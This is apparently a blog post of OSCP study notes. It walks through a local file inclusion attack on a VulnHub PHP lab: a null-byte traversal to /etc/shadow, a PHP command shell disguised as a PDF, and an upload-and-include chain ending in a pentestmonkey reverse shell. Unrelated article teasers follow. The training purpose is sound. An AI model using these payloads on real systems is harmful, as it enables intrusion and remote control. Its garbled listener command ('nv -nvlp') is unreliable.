Local File Inclusion[LFI]

Target Pentester Lab: Download from the following website:

https://www.vulnhub.com/entry/pentester-lab-php-include-and-post-exploitation,79/

1. Use netdiscover to find the IP of the target server.  The IP address of the target server is 10.0.0.22.

netdiscover

2. Click different buttons of the website, and watch the change of the URL.           page= XXXX

3. Scan the target website using the tool nikto.

nikto -h 10.0.0.22

4.Change the URL to "http://10.0.0.22/index.php?page=../../etc/shadow%00", and press enter.  We can find the following warning message.

5. Return to the submit page. Find that we can upload pdf files to the website.

6. Make a shell.pdf file and save it.

%PDF-1.4

<?php

      system($_GET["cmd"]);

?>

7. Upload the shell.pdf to target website.

8.Change the URL to the following type with shell commands.

http://10.0.0.22/index.php?page=uploads/shell.pdf%00&cmd=whoami

http://10.0.0.22/index.php?page=uploads/shell.pdf%00&cmd=pwd

9 Down load a web-shells from the following website.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

10.Modify the web-shell file. ①Add the PDF tag. ②Change the ip and port.

11.Copy the php shell file as shell2.pdf. And upload this file to the website.

cp php-reverse-shell.php shell2.pdf

12. Listening the port 4444 on Linux

nv -nvlp

13.Browse the following URL through Firefox.

http://10.0.0.22/index.php?page=uploads/shell2.pdf%00

14. Then we can use the shell command we like on the terminal.

OSCP Learning Notes - WebApp Exploitation(4)的更多相关文章

  1. OSCP Learning Notes - WebApp Exploitation(5)

    Remote File Inclusion[RFI] Prepare: Download the DVWA from the following website and deploy it on yo ...

  2. OSCP Learning Notes - WebApp Exploitation(3)

    SQL Injection[SQLi] Refrence: SQL Injection Authentication Bypass Cheat Sheet https://pentestlab.blo ...

  3. OSCP Learning Notes - WebApp Exploitation(2)

    Cross-Site Scripting(XSS) 1. Using the tool - netdiscover to find the IP of target server. netdiscov ...

  4. OSCP Learning Notes - WebApp Exploitation(1)

    Installing XSS&MySQL FILE Download the Pentester Lab: XSS and MySQL FILE from the following webs ...

  5. OSCP Learning Notes - Post Exploitation(2)

    Windows Post Exploitation Target Server: IE8-Win 7 VM 1. Download and upload the fgdump, PwDump7, wc ...

  6. OSCP Learning Notes - Post Exploitation(1)

    Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l pay ...

  7. OSCP Learning Notes - Post Exploitation(4)

    Pivoting 1. Edit the virtual network settings of the Vmware. 2. Set the Network Adapter(s) of Kali L ...

  8. OSCP Learning Notes - Post Exploitation(3)

    Post-Exploit Password Attacks 1. Crack using the tool - john (Too slow in real world) Locate the roc ...

  9. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

随机推荐

  1. PHP丨PHP基础知识之流程控制for循环「理论篇」

    今天公司同事在看for循环,那么我们今天就来讲讲for循环吧! for循环是编程语言中一种循环语句,而循环语句由循环体及循环的判定条件两部分组成,其表达式为:for(单次表达式;条件表达式;末尾循环体 ...

  2. jmeter的参数化

    [4种参数化] 用户参数 适用于参数取值范围很小的时候使用 CSV数据文件设置 适用于参数取值范围较大的时候使用,该方法具有更大的灵活性 用户定义的变量 一般用于测试计划中不需要随请求迭代的参数设置, ...

  3. redis高级命令2

    主服务负责数据的写,从服务器负责客户端的高并发来读 创建主从复制 clone不能让上面的mac地址不能重复,IP地址也不能重复 122和123是从服务器,我们修改二者的配置文件 其中 192.168. ...

  4. .net core 静态类获取appsettings

    注入获取 通过IConfiguration直接获取的方法官方文档里就有,可以直接看这里 如:appsettings.json { "Position": { "Title ...

  5. keras训练实例-python实现

    用keras训练模型并实时显示loss/acc曲线,(重要的事情说三遍:实时!实时!实时!)实时导出loss/acc数值(导出的方法就是实时把loss/acc等写到一个文本文件中,其他模块如前端调用时 ...

  6. 从零开始实现ASP.NET Core MVC的插件式开发(八) - Razor视图相关问题及解决方案

    标题:从零开始实现ASP.NET Core MVC的插件式开发(八) - Razor视图相关问题及解决方案 作者:Lamond Lu 地址:https://www.cnblogs.com/lwqlun ...

  7. 从发布-订阅模式谈谈 Flask 的 Signals

    发布-订阅模式 发布-订阅模式,顾名思义,就像大家订报纸一样,出版社发布不同类型的报纸杂志不同的读者根据不同的需求预定符合自己口味的的报纸杂志,付费之后由邮局安排人员统一派送. 上面一段话,提到了发布 ...

  8. 前端笔记(创建顺序数组、取选中月最后一天日期、判断变量、git命令)

    创建一个从0开始的顺序数组 [...new Array(5).keys()] //[0,1,2,3,4] 数组反向 [0,1,2,3,4,5].reverse() //[4,3,2,1,0] 取选中月 ...

  9. 每日一题 - 剑指 Offer 41. 数据流中的中位数

    题目信息 时间: 2019-06-30 题目链接:Leetcode tag: 大根堆 小根堆 难易程度:中等 题目描述: 如何得到一个数据流中的中位数?如果从数据流中读出奇数个数值,那么中位数就是所有 ...

  10. 第三方 CSS 并不安全

    最近一段时间,关于 通过 CSS 创建 “keylogger”(键盘记录器) 的讨论很多. 有些人呼吁浏览器厂商去“修复”它.有些人则深入研究,表示它仅能影响通过类 React 框架建立的网站,并指责 ...